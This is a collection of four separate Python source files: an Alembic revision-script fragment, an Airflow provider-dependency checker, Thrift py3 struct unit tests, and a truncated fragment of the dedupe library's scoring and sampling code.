"'branch_labels' section?" % (
script.revision, branch_labels, script.path
))
self.revision_map.add_revision(script)
return script
def _rev_path(self, path, rev_id, message, create_date):
slug = "_".join(_slug_re.findall(message or "")).lower()
if len(slug) > self.truncate_slug_length:
slug = slug[:self.truncate_slug_length].rsplit('_', 1)[0] + '_'
filename = "%s.py" % (
self.file_template % {
'rev': rev_id,
'slug': slug,
'year': create_date.year,
'month': create_date.month,
'day': create_date.day,
'hour': create_date.hour,
'minute': create_date.minute,
'second': create_date.second
}
)
return os.path.join(path, filename)
class Script(revision.Revision):
"""Represent a single revision file in a ``versions/`` directory.
The :class:`.Script` instance is returned by methods
such as :meth:`.ScriptDirectory.iterate_revisions`.
"""
def __init__(self, module, rev_id, path):
self.module = module
self.path = path
super(Script, self).__init__(
rev_id,
module.down_revision,
branch_labels=util.to_tuple(
getattr(module, 'branch_labels', None), default=()),
dependencies=util.to_tuple(
getattr(module, 'depends_on', None), default=())
)
module = None
"""The Python module representing the actual script itself."""
path = None
"""Filesystem path of the script."""
@property
def doc(self):
"""Return the docstring given in the script."""
return re.split("\n\n", self.longdoc)[0]
@property
def longdoc(self):
"""Return the docstring given in the script."""
doc = self.module.__doc__
if doc:
if hasattr(self.module, "_alembic_source_encoding"):
doc = doc.decode(self.module._alembic_source_encoding)
return doc.strip()
else:
return ""
@property
def log_entry(self):
entry = "Rev: %s%s%s%s\n" % (
self.revision,
" (head)" if self.is_head else "",
" (branchpoint)" if self.is_branch_point else "",
" (mergepoint)" if self.is_merge_point else "",
)
if self.is_merge_point:
entry += "Merges: %s\n" % (self._format_down_revision(), )
else:
entry += "Parent: %s\n" % (self._format_down_revision(), )
if self.dependencies:
entry += "Also depends on: %s\n" % (
util.format_as_comma(self.dependencies))
if self.is_branch_point:
entry += "Branches into: %s\n" % (
util.format_as_comma(self.nextrev))
if self.branch_labels:
entry += "Branch names: %s\n" % (
util.format_as_comma(self.branch_labels), )
entry += "Path: %s\n" % (self.path,)
entry += "\n%s\n" % (
"\n".join(
" %s" % para
for para in self.longdoc.splitlines()
)
)
return entry
def __str__(self):
return "%s -> %s%s%s%s, %s" % (
self._format_down_revision(),
self.revision,
" (head)" if self.is_head else "",
" (branchpoint)" if self.is_branch_point else "",
" (mergepoint)" if self.is_merge_point else "",
self.doc)
def _head_only(
self, include_branches=False, include_doc=False,
include_parents=False, tree_indicators=True,
head_indicators=True):
text = self.revision
if include_parents:
if self.dependencies:
text = "%s (%s) -> %s" % (
self._format_down_revision(),
util.format_as_comma(self.dependencies),
text
)
else:
text = "%s -> %s" % (
self._format_down_revision(), text)
if include_branches and self.branch_labels:
text += " (%s)" % util.format_as_comma(self.branch_labels)
if head_indicators or tree_indicators:
text += "%s%s" % (
" (head)" if self._is_real_head else "",
" (effective head)" if self.is_head and
not self._is_real_head else ""
)
if tree_indicators:
text += "%s%s" % (
" (branchpoint)" if self.is_branch_point else "",
" (mergepoint)" if self.is_merge_point else ""
)
if include_doc:
text += ", %s" % self.doc
return text
def cmd_format(
self,
verbose,
include_branches=False, include_doc=False,
include_parents=False, tree_indicators=True):
if verbose:
return self.log_entry
else:
return self._head_only(
include_branches, include_doc,
include_parents, tree_indicators)
def _format_down_revision(self):
if not self.down_revision:
return "<base>"
else:
return util.format_as_comma(self._versioned_down_revisions)
@classmethod
def _from_path(cls, scriptdir, path):
dir_, filename = os.path.split(path)
return cls._from_filename(scriptdir, dir_, filename)
@classmethod
def _list_py_dir(cls, scriptdir, path):
if scriptdir.sourceless:
# read files in version path, e.g. pyc or pyo files
# in the immediate path
paths = os.listdir(path)
names = set(fname.split(".")[0] for fname in paths)
# look for __pycache__
if os.path.exists(os.path.join(path, '__pycache__')):
# add all files from __pycache__ whose filename is not
# already in the names we got from the version directory.
# add as relative paths including __pycache__ token
paths.extend(
os.path.join('__pycache__', pyc)
for pyc in os.listdir(os.path.join(path, '__pycache__'))
if pyc.split(".")[0] not in names
)
return paths
else:
return os.listdir(path)
@classmethod
def _from_filename(cls, scriptdir, dir_, filename):
if scriptdir.sourceless:
py_match = _sourceless_rev_file.match(filename)
else:
py_match = _only_source_rev_file.match(filename)
if not py_match:
return None
py_filename = py_match.group(1)
if scriptdir.sourceless:
is_c = py_match.group(2) == 'c'
is_o = py_match.group(2) == 'o'
else:
is_c = is_o = False
if is_o or is_c:
py_exists = os.path.exists(os.path.join(dir_, py_filename))
pyc_exists = os.path.exists(os.path.join(dir_, py_filename + "c"))
# prefer .py over .pyc because we'd like to get the
# source encoding; prefer .pyc over .pyo because we'd like to
# have the docstrings which a -OO file would not have
if py_exists or is_o and pyc_exists:
return None
module = util.load_python_file(dir_, filename)
if not hasattr(module, "revision"):
# attempt to get the revision id from the script name,
# this for legacy only
m = _legacy_rev.match(filename)
if not m:
raise util.CommandError(
"Could not determine revision id from filename %s. "
"Be sure the 'revision' variable is "
"declared inside the script (please see 'Upgrading "
"from Alembic 0.1 to 0.2' in the documentation)."
% filename)
else:
revision = m.group(1)
else:
revision = module.revision
return Script(module, revision, os.path.join(dir_, filename))
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import os
import sys
from ast import Import, ImportFrom, NodeVisitor, parse
from collections import defaultdict
from os.path import dirname, sep
from typing import Dict, List, Optional
from setup import PROVIDERS_REQUIREMENTS
sys.path.append(os.path.join(dirname(__file__), os.pardir))
AIRFLOW_PROVIDERS_FILE_PREFIX = "airflow" + sep + "providers" + sep
AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX = "tests" + sep + "providers" + sep
AIRFLOW_PROVIDERS_IMPORT_PREFIX = "airflow.providers."
# List of information messages generated
infos: List[str] = []
# List of warnings generated
warnings: List[str] = []
# list of errors generated
errors: List[str] = []
# store dependencies
dependencies: Dict[str, List[str]] = defaultdict(list)
def find_provider(provider_elements: List[str]) -> Optional[str]:
"""
Finds provider name from the list of elements provided. It looks the providers up
in PROVIDERS_DEPENDENCIES map taken from the provider's package setup.
:param provider_elements: array of elements of the path (split)
:return: provider name or None if no provider could be found
"""
provider = ""
separator = ""
provider_keys = PROVIDERS_REQUIREMENTS.keys()
for element in provider_elements:
provider = provider + separator + element
if provider in provider_keys:
return provider
separator = "."
return None
def get_provider_from_file_name(file_name: str) -> Optional[str]:
"""
Retrieves provider name from file name
:param file_name: name of the file
:return: provider name or None if no provider could be found
"""
if AIRFLOW_PROVIDERS_FILE_PREFIX not in file_name and \
AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX not in file_name:
# We should only check file that are provider
errors.append(f"Wrong file not in the providers package = {file_name}")
return None
suffix = get_file_suffix(file_name)
split_path = suffix.split(sep)[2:]
provider = find_provider(split_path)
if not provider and file_name.endswith("__init__.py"):
infos.append(f"Skipped file = {file_name}")
elif not provider:
warnings.append(f"Provider not found for path = {file_name}")
return provider
def get_file_suffix(file_name):
if AIRFLOW_PROVIDERS_FILE_PREFIX in file_name:
return file_name[file_name.find(AIRFLOW_PROVIDERS_FILE_PREFIX):]
if AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX in file_name:
return file_name[file_name.find(AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX):]
return None
def get_provider_from_import(import_name: str) -> Optional[str]:
"""
Retrieves provider name from file name
:param import_name: name of the import
:return: provider name or None if no provider could be found
"""
if AIRFLOW_PROVIDERS_IMPORT_PREFIX not in import_name:
# skip silently - we expect non-providers imports
return None
suffix = import_name[import_name.find(AIRFLOW_PROVIDERS_IMPORT_PREFIX):]
split_import = suffix.split(".")[2:]
provider = find_provider(split_import)
if not provider:
warnings.append(f"Provider not found for import = {import_name}")
return provider
class ImportFinder(NodeVisitor):
"""
AST visitor that collects all imported names in its imports
"""
def __init__(self, filename):
self.imports: List[str] = []
self.filename = filename
self.handled_import_exception = List[str]
self.tried_imports: List[str] = []
def process_import(self, import_name: str):
self.imports.append(import_name)
# noinspection PyMethodMayBeStatic
def get_import_name_from_import_from(self, node: ImportFrom) -> List[str]:
"""
Retrieves import name from the "from" import.
:param node: ImportFrom name
:return: import name
"""
import_names: List[str] = []
for alias in node.names:
name = alias.name
fullname = '%s.%s' % (node.module, name) if node.module else name
import_names.append(fullname)
return import_names
# noinspection PyPep8Naming
def visit_Import(self, node: Import): # pylint: disable=invalid-name
for alias in node.names:
self.process_import(alias.name)
# noinspection PyPep8Naming
def visit_ImportFrom(self, node: ImportFrom): # pylint: disable=invalid-name
if node.module == '__future__':
return
for fullname in self.get_import_name_from_import_from(node):
self.process_import(fullname)
def get_imports_from_file(file_name: str) -> List[str]:
"""
Retrieves imports from file.
:param file_name: name of the file
:return: list of import names
"""
try:
with io.open(file_name, "rt", encoding="utf-8") as f:
root = parse(f.read(), file_name)
except Exception:
print(f"Error when opening file {file_name}", file=sys.stderr)
raise
visitor = ImportFinder(file_name)
visitor.visit(root)
return visitor.imports
def check_if_different_provider_used(file_name: str):
file_provider = get_provider_from_file_name(file_name)
if not file_provider:
return
imports = get_imports_from_file(file_name)
for import_name in imports:
import_provider = get_provider_from_import(import_name)
if import_provider and file_provider != import_provider:
dependencies[file_provider].append(import_provider)
def parse_arguments():
import argparse
parser = argparse.ArgumentParser(
description='Checks if dependencies between packages are handled correctly.')
parser.add_argument("-f", "--provider-dependencies-file",
help="Stores dependencies between providers in the file")
parser.add_argument("-d", "--documentation-file",
help="Updates package documentation in the file specified (.rst)")
parser.add_argument('files', nargs='*')
args = parser.parse_args()
if len(args.files) < 1:
parser.print_usage()
print()
sys.exit(2)
return args.files, args.provider_dependencies_file, args.documentation_file
PREFIX = " "
HEADER = """
========================== ===========================
Package Extras
========================== ===========================
"""
FOOTER = """========================== ===========================
"""
def insert_documentation(deps_dict: Dict[str, List[str]], res: List[str]):
res += HEADER.splitlines(keepends=True)
for package, deps in deps_dict.items():
deps_str = ",".join(deps)
res.append(f"{package:27}{deps_str}\n")
res += FOOTER.splitlines(keepends=True)
if __name__ == '__main__':
print()
files, provider_dependencies_file_name, documentation_file_name = parse_arguments()
num_files = 0
for file in files:
check_if_different_provider_used(file)
num_files += 1
print(f"Verified {num_files} files.")
if infos:
print("\nInformation messages:\n")
for info in infos:
print(PREFIX + info)
print(f"Total: {len(infos)} information messages.")
if warnings:
print("\nWarnings!\n")
for warning in warnings:
print(PREFIX + warning)
print(f"Total: {len(warnings)} warnings.")
if errors:
print("\nErrors!\n")
for error in errors:
print(PREFIX + error)
print(f"Total: {len(errors)} errors.")
unique_sorted_dependencies: Dict[str, List[str]] = {}
for key in sorted(dependencies.keys()):
unique_sorted_dependencies[key] = sorted(list(set(dependencies[key])))
if provider_dependencies_file_name:
with open(provider_dependencies_file_name, "w") as providers_file:
json.dump(unique_sorted_dependencies, providers_file, indent=2)
providers_file.write("\n")
print()
print(f"Written provider dependencies to the file {provider_dependencies_file_name}")
print()
if documentation_file_name:
with io.open(documentation_file_name, "r", encoding="utf-8") as documentation_file:
text = documentation_file.readlines()
replacing = False
result: List[str] = []
for line in text:
if line.startswith(" .. START PACKAGE DEPENDENCIES HERE"):
replacing = True
result.append(line)
insert_documentation(unique_sorted_dependencies, result)
if line.startswith(" .. END PACKAGE DEPENDENCIES HERE"):
replacing = False
if not replacing:
result.append(line)
with io.open(documentation_file_name, "w", encoding="utf-8") as documentation_file:
documentation_file.write("".join(result))
print()
print(f"Written package extras to the file {documentation_file_name}")
print()
if errors:
print()
print("ERROR! Errors found during verification. Exiting!")
print()
sys.exit(1)
print()
print("Verification complete! Success!")
print()
| |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import math
import unittest
from testing.types import (
Color,
File,
Integers,
Kind,
Nested1,
Nested2,
Nested3,
NonCopyable,
Optionals,
Reserved,
Runtime,
SlowCompare,
UnusedError,
easy,
hard,
numerical,
PrivateCppRefField,
)
from thrift.py3.common import Protocol
from thrift.py3.serializer import deserialize
from thrift.py3.types import Struct
class StructTests(unittest.TestCase):
def test_isset_Struct(self) -> None:
serialized = b'{"name":"/dev/null","type":8}'
file = deserialize(File, serialized, protocol=Protocol.JSON)
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `File`.
self.assertTrue(Struct.isset(file).type)
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `File`.
self.assertFalse(Struct.isset(file).permissions)
# required fields are always set
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `File`.
self.assertTrue(Struct.isset(file).name)
serialized = b'{"name":"/dev/null"}'
file = deserialize(File, serialized, protocol=Protocol.JSON)
self.assertEqual(file.type, Kind.REGULAR)
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `File`.
self.assertFalse(Struct.isset(file).type)
def test_isset_repr(self) -> None:
serialized = b'{"name":"/dev/null","type":8}'
file = deserialize(File, serialized, protocol=Protocol.JSON)
self.assertEqual(
"Struct.isset(<File>, name=True, permissions=False, type=True)",
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
# 1st param but got `File`.
repr(Struct.isset(file)),
)
self.assertEqual(
"Struct.isset(<File>, name=True, permissions=False, type=True)",
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
# 1st param but got `File`.
str(Struct.isset(file)),
)
def test_isset_Union(self) -> None:
i = Integers(large=2)
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
# 1st param but got `Integers`.
Struct.isset(i).large
def test_isset_Error(self) -> None:
e = UnusedError()
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `UnusedError`.
self.assertFalse(Struct.isset(e).message)
e = UnusedError(message="ACK")
# pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
# param but got `UnusedError`.
self.assertTrue(Struct.isset(e).message)
def test_copy(self) -> None:
x = easy(val=1, an_int=Integers(small=300), name="foo", val_list=[1, 2, 3, 4])
dif_list = copy.copy(x.val_list)
self.assertEqual(x.val_list, dif_list)
dif_int = copy.copy(x.an_int)
self.assertEqual(x.an_int, dif_int)
def test_hashability(self) -> None:
hash(easy())
def test_str(self) -> None:
self.assertEqual(
"easy(val=0, val_list=i[], name=None, an_int=Integers(type=EMPTY, value=None))",
str(easy()),
)
self.assertEqual(
"easy(val=0, val_list=i[], name=None, an_int=Integers(type=EMPTY, value=None))",
repr(easy()),
)
x = easy(val=1, an_int=Integers(small=300), name="foo", val_list=[1, 2, 3, 4])
self.assertEqual(
"easy(val=1, val_list=i[1, 2, 3, 4], name='foo', an_int=Integers(type=small, value=300))",
str(x),
)
self.assertEqual(
"easy(val=1, val_list=i[1, 2, 3, 4], name='foo', an_int=Integers(type=small, value=300))",
repr(x),
)
def test_optional_struct_creation(self) -> None:
with self.assertRaises(TypeError):
# pyre-fixme[19]: Expected 0 positional arguments.
easy(1, [1, 1], "test", Integers(tiny=1))
easy(val=1, an_int=Integers(small=500))
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `Optional[str]` for 1st param but got `bytes`.
easy(name=b"binary")
# Only Required Fields don't accept None
easy(val=5, an_int=None)
def test_required_fields_not_enforced(self) -> None:
# None is not acceptable as a string
hard(val=1, val_list=[1, 2], name=None, an_int=Integers(small=1))
hard(val=1, val_list=[1, 2])
def test_call_replace(self) -> None:
x = easy(val=1, an_int=Integers(small=300), name="foo")
y = x(name="bar")
self.assertNotEqual(x.name, y.name)
z = y(an_int=None, val=4)
self.assertNotEqual(x.an_int, z.an_int)
self.assertNotEqual(x.val, z.val)
self.assertIsNone(z.an_int.value)
self.assertEqual(y.val, x.val)
self.assertEqual(y.an_int, x.an_int)
x = easy()
self.assertIsNotNone(x.val)
self.assertIsNotNone(x.val_list)
self.assertIsNone(x.name)
self.assertIsNotNone(x.an_int)
def test_call_replace_container(self) -> None:
x = Optionals(values=["a", "b", "c"])
z = x(values=["b", "c"])
self.assertEqual(z.values, ["b", "c"])
y = z(values=None)
self.assertIsNone(y.values)
def test_runtime_checks(self) -> None:
x = Runtime()
with self.assertRaises(TypeError):
x(bool_val=5)
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `Optional[bool]` for 1st param but got `int`.
Runtime(bool_val=5)
with self.assertRaises(TypeError):
x(enum_val=2)
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `Optional[Color]` for 1st param but got `int`.
Runtime(enum_val=2)
with self.assertRaises(TypeError):
x(int_list_val=["foo", "bar", "baz"])
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `Optional[typing.Sequence[int]]` for 1st param
# but got `List[str]`.
Runtime(int_list_val=["foo", "bar", "baz"])
def test_reserved(self) -> None:
x = Reserved(
from_="hello",
nonlocal_=3,
ok="bye",
is_cpdef=True,
move="Qh4xe1",
inst="foo",
changes="bar",
)
self.assertEqual(x.from_, "hello")
self.assertEqual(x.nonlocal_, 3)
self.assertEqual(x.ok, "bye")
self.assertEqual(x.is_cpdef, True)
self.assertEqual(x.move, "Qh4xe1")
self.assertEqual(x.inst, "foo")
self.assertEqual(x.changes, "bar")
def test_ordering(self) -> None:
x = Runtime(bool_val=False, enum_val=Color.red, int_list_val=[64, 128])
y = x(bool_val=True)
self.assertLess(x, y)
self.assertLessEqual(x, y)
self.assertGreater(y, x)
self.assertGreaterEqual(y, x)
self.assertEquals([x, y], sorted([y, x]))
def test_noncomparable(self) -> None:
x = SlowCompare(field1="text", field2=10, field3=Color.red)
y = x(field3=Color.blue)
x2 = SlowCompare(field1="text", field2=10, field3=Color.red)
self.assertEqual(x, x2)
self.assertNotEqual(x, y)
def test_noncopyable(self) -> None:
x = NonCopyable(num=123)
with self.assertRaises(TypeError):
x(num=1234)
with self.assertRaises(TypeError):
copy.copy(x)
with self.assertRaises(TypeError):
copy.deepcopy(x)
def test_init_with_invalid_field(self) -> None:
with self.assertRaises(TypeError):
# pyre-ignore[28]: intentionally used a wrong field name "val_lists" for test
easy(val=1, an_int=Integers(small=300), name="foo", val_lists=[1, 2, 3, 4])
def test_iterate(self) -> None:
x = Reserved(
from_="hello",
nonlocal_=3,
ok="bye",
is_cpdef=True,
move="Qh4xe1",
inst="foo",
changes="bar",
)
self.assertEqual(
list(x),
[
("from_", "hello"),
("nonlocal_", 3),
("ok", "bye"),
("is_cpdef", True),
("move", "Qh4xe1"),
("inst", "foo"),
("changes", "bar"),
],
)
def test_update_nested_fields(self) -> None:
n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
n = Struct.update_nested_field(n, {"a.b.c": easy(val=128)})
self.assertEqual(n.a.b.c.val, 128)
def test_update_multiple_nested_fields(self) -> None:
n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
n = Struct.update_nested_field(
n,
{
"a.b.c.name": "bar",
"a.b.c.val": 256,
},
)
self.assertEqual(n.a.b.c.name, "bar")
self.assertEqual(n.a.b.c.val, 256)
def test_update_invalid_nested_fields(self) -> None:
n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
with self.assertRaises(ValueError):
Struct.update_nested_field(n, {"": 0})
with self.assertRaises(ValueError):
Struct.update_nested_field(n, {"e": 0})
with self.assertRaises(ValueError):
Struct.update_nested_field(n, {"a.b.e": 0})
with self.assertRaises(ValueError):
Struct.update_nested_field(n, {"a.e.f": 0})
def test_update_conflicting_nested_fields(self) -> None:
n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
with self.assertRaises(ValueError):
n = Struct.update_nested_field(
n,
{
"a.b.c": easy(val=128),
"a.b.c.val": 256,
},
)
class NumericalConversionsTests(unittest.TestCase):
def test_overflow(self) -> None:
with self.assertRaises(OverflowError):
numerical(float_val=5, int_val=2 ** 63 - 1)
with self.assertRaises(OverflowError):
numerical(float_val=5, int_val=2, int_list=[5, 2 ** 32])
def test_int_to_float(self) -> None:
x = numerical(int_val=5, float_val=5, float_list=[1, 5, 6])
x(float_val=10)
x(float_val=10)
x(float_list=[6, 7, 8])
def test_int_to_i64(self) -> None:
large = 2 ** 63 - 1
numerical(int_val=5, float_val=5, i64_val=int(large))
too_large = 2 ** 65 - 1
with self.assertRaises(OverflowError):
numerical(int_val=5, float_val=5, i64_val=int(too_large))
def test_float_to_int_required_field(self) -> None:
with self.assertRaises(TypeError):
# pyre-fixme[6]: Expected `Optional[int]` for 1st param but got `float`.
numerical(int_val=math.pi, float_val=math.pi)
def test_float_to_int_unqualified_field(self) -> None:
with self.assertRaises(TypeError):
numerical(
float_val=math.pi,
# pyre-fixme[6]: Expected `Optional[int]` for 3rd param but got `float`.
int_val=math.pi,
)
def test_float_to_int_list(self) -> None:
with self.assertRaises(TypeError):
numerical(
int_val=5,
float_val=math.pi,
# pyre-fixme[6]: Expected `Optional[typing.Sequence[int]]` for 3rd
# param but got `List[float]`.
int_list=[math.pi, math.e],
)
def test_private_cpp_ref_field(self) -> None:
x = PrivateCppRefField(
field1=easy(val=1, name="11"),
field2=easy(val=2, name="22"),
field3=easy(val=3, name="33"),
)
field1 = x.field1
field2 = x.field2
field3 = x.field3
if field1:
self.assertEqual(field1.val, 1)
self.assertEqual(field1.name, "11")
if field2:
self.assertEqual(field2.val, 2)
self.assertEqual(field2.name, "22")
if field3:
self.assertEqual(field3.val, 3)
self.assertEqual(field3.name, "33")
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from builtins import range, next, zip, map
from future.utils import viewvalues
import sys
if sys.version < '3':
text_type = unicode
binary_type = str
shelve_key = lambda x: x.encode()
int_type = long
else:
text_type = str
binary_type = bytes
unicode = str
shelve_key = lambda x: x
int_type = int
import itertools
import time
import tempfile
import os
import operator
import random
import collections
import warnings
import shutil
import shelve
import pickle
import functools
try:
import collections.abc as collections_abc
except ImportError:
import collections as collections_abc
import numpy
class ChildProcessError(Exception) :
pass
class BlockingError(Exception):
pass
def randomPairs(n_records, sample_size):
"""
Return random combinations of indices for a square matrix of size n
records. For a discussion of how this works see
http://stackoverflow.com/a/14839010/98080
"""
n = int(n_records * (n_records - 1) / 2)
if sample_size >= n :
random_pairs = numpy.arange(n, dtype='uint')
else:
try:
random_pairs = numpy.array(random.sample(range(n), sample_size),
dtype='uint')
except OverflowError:
return randomPairsWithReplacement(n_records, sample_size)
b = 1 - 2 * n_records
i = numpy.floor((-b - 2 * numpy.sqrt(2 * (n - random_pairs) + 0.25)) / 2).astype('uint')
j = numpy.rint(random_pairs + i * (b + i + 2) / 2 + 1).astype('uint')
return zip(i, j)
def randomPairsMatch(n_records_A, n_records_B, sample_size):
"""
Return random combinations of indices for record list A and B
"""
n = int(n_records_A * n_records_B)
if sample_size >= n:
random_pairs = numpy.arange(n)
else:
random_pairs = numpy.array(random.sample(range(n), sample_size),
dtype=int)
i, j = numpy.unravel_index(random_pairs, (n_records_A, n_records_B))
return zip(i, j)
def randomPairsWithReplacement(n_records, sample_size) :
# If the population is very large relative to the sample
# size than we'll get very few duplicates by chance
warnings.warn("There may be duplicates in the sample")
try :
random_indices = numpy.random.randint(n_records,
size=sample_size*2)
except (OverflowError, ValueError):
max_int = numpy.iinfo('int').max
warnings.warn("Asked to sample pairs from %d records, will only sample pairs from first %d records" % (n_records, max_int))
random_indices = numpy.random.randint(max_int,
size=sample_size*2)
random_indices = random_indices.reshape((-1, 2))
random_indices.sort(axis=1)
return [(p.item(), q.item()) for p, q in random_indices]
class ScoreDupes(object) :
def __init__(self, data_model, classifier, threshold) :
self.data_model = data_model
self.classifier = classifier
self.threshold = threshold
self.score_queue = None
def __call__(self, records_queue, score_queue) :
self.score_queue = score_queue
while True :
record_pairs = records_queue.get()
if record_pairs is None :
break
try :
filtered_pairs = self.fieldDistance(record_pairs)
if filtered_pairs is not None :
score_queue.put(filtered_pairs)
except Exception as e :
score_queue.put(e)
raise
score_queue.put(None)
def fieldDistance(self, record_pairs) :
ids = []
records = []
for record_pair in record_pairs :
((id_1, record_1, smaller_ids_1),
(id_2, record_2, smaller_ids_2)) = record_pair
if smaller_ids_1.isdisjoint(smaller_ids_2) :
ids.append((id_1, id_2))
records.append((record_1, record_2))
if records :
distances = self.data_model.distances(records)
scores = self.classifier.predict_proba(distances)[:,-1]
mask = scores > self.threshold
if mask.any():
id_type = sniff_id_type(ids)
ids = numpy.array(ids, dtype=id_type)
dtype = numpy.dtype([('pairs', id_type, 2),
('score', 'f4', 1)])
temp_file, file_path = tempfile.mkstemp()
os.close(temp_file)
scored_pairs = numpy.memmap(file_path,
shape=numpy.count_nonzero(mask),
dtype=dtype)
scored_pairs['pairs'] = ids[mask]
scored_pairs['score'] = scores[mask]
return file_path, dtype
def mergeScores(score_queue, result_queue, stop_signals) :
scored_pairs_file, file_path = tempfile.mkstemp()
os.close(scored_pairs_file)
seen_signals = 0
end = 0
while seen_signals < stop_signals :
score_chunk = score_queue.get()
if isinstance(score_chunk, Exception) :
result_queue.put(score_chunk)
raise
elif score_chunk is None:
seen_signals += 1
else:
score_file, dtype = score_chunk
score_chunk = numpy.memmap(score_file, mode='r', dtype=dtype)
chunk_size = len(score_chunk)
fp = numpy.memmap(file_path, dtype=dtype,
offset=(end * dtype.itemsize),
shape=(chunk_size, ))
fp[:chunk_size] = score_chunk
end += chunk_size
del score_chunk
os.remove(score_file)
if end:
result_queue.put((file_path, dtype, end))
else:
result_queue.put(None)
def scoreDuplicates(records, data_model, classifier, num_cores=1, threshold=0) :
if num_cores < 2 :
from multiprocessing.dummy import Process, Queue
SimpleQueue = Queue
else :
from .backport import Process, SimpleQueue, Queue
first, records = peek(records)
if first is None:
raise BlockingError("No records have been blocked together. "
"Is the data you are trying to match like "
"the data you trained on?")
record_pairs_queue = Queue(2)
score_queue = SimpleQueue()
result_queue = SimpleQueue()
n_map_processes = max(num_cores, 1)
score_records = ScoreDupes(data_model, classifier, threshold)
map_processes = [Process(target=score_records,
args=(record_pairs_queue,
score_queue))
for _ in range(n_map_processes)]
[process.start() for process in map_processes]
reduce_process = Process(target=mergeScores,
args=(score_queue,
result_queue,
n_map_processes))
reduce_process.start()
fillQueue(record_pairs_queue, records, n_map_processes)
result = result_queue.get()
if isinstance(result, Exception) :
raise ChildProcessError
if result :
scored_pairs_file, dtype, size = result
scored_pairs = numpy.memmap(scored_pairs_file,
dtype=dtype,
shape=(size,))
else:
scored_pairs = numpy.array([], dtype=dtype)
reduce_process.join()
[process.join() for process in map_processes]
return scored_pairs
def fillQueue(queue, iterable, stop_signals) :
iterable = iter(iterable)
chunk_size = 10000
upper_bound = 7000000 # this number worked, but is unprincipled
multiplier = 1.1
# initial values
i = 0
n_records = 0
t0 = time.clock()
last_rate = 10000
while True :
chunk = tuple(itertools.islice(iterable, int(chunk_size)))
if chunk :
queue.put(chunk)
del chunk
n_records += chunk_size
i += 1
if i % 10 :
time_delta = max(time.clock() - t0, 0.0001)
current_rate = n_records/time_delta
# chunk_size is always either growing or shrinking, if
# the shrinking led to a faster rate, keep
# shrinking. Same with growing. If the rate decreased,
# reverse directions
if current_rate < last_rate :
multiplier = 1/multiplier
chunk_size = min(max(chunk_size * multiplier, 1), upper_bound)
last_rate = current_rate
n_records = 0
t0 = time.clock()
else :
# put poison pills in queue to tell scorers that they are
# done
[queue.put(None) for _ in range(stop_signals)]
break
class ScoreGazette(object) :
def __init__(self, data_model, classifier, threshold) :
self.data_model = data_model
self.classifier = classifier
self.threshold = threshold
def __call__(self, block):
ids = []
records = []
for record_pair in block:
((id_1, record_1, _),
(id_2, record_2, _)) = record_pair
ids.append((id_1, id_2))
records.append((record_1, record_2))
distances = self.data_model.distances(records)
scores = self.classifier.predict_proba(distances)[:,-1]
mask = scores > self.threshold
id_type = sniff_id_type(ids)
ids = numpy.array(ids, dtype=id_type)
dtype = numpy.dtype([('pairs', id_type, 2),
('score', 'f4', 1)])
scored_pairs = numpy.empty(shape=numpy.count_nonzero(mask),
dtype=dtype)
scored_pairs['pairs'] = ids[mask]
scored_pairs['score'] = scores[mask]
return scored_pairs
def scoreGazette(records, data_model, classifier, num_cores=1, threshold=0) :
if num_cores < 2 :
imap = map
else :
from .backport import Pool
n_map_processes = max(num_cores, 1)
pool = Pool(processes=n_map_processes)
imap = functools.partial(pool.imap_unordered, chunksize=1)
first, records = peek(records)
if first is None:
raise ValueError("No records to match")
score_records = ScoreGazette(data_model, classifier, threshold)
for scored_pairs in imap(score_records, records):
yield scored_pairs
def peek(records) :
try :
record = next(records)
except TypeError as e:
if "not an iterator" not in str(e) :
raise
try :
records = iter(records)
record = next(records)
except StopIteration :
return None, records
except StopIteration :
return None, records
return record, itertools.chain([record], records)
def isIndexed(data, offset) :
return all(i in data for i in range(offset, offset + len(data)))
def index(data, offset=0) :
if isIndexed(data, offset):
return data
else :
data = dict(zip(itertools.count(offset),
viewvalues(data)))
return data
def iunzip(iterable, internal_length): # pragma: no cover
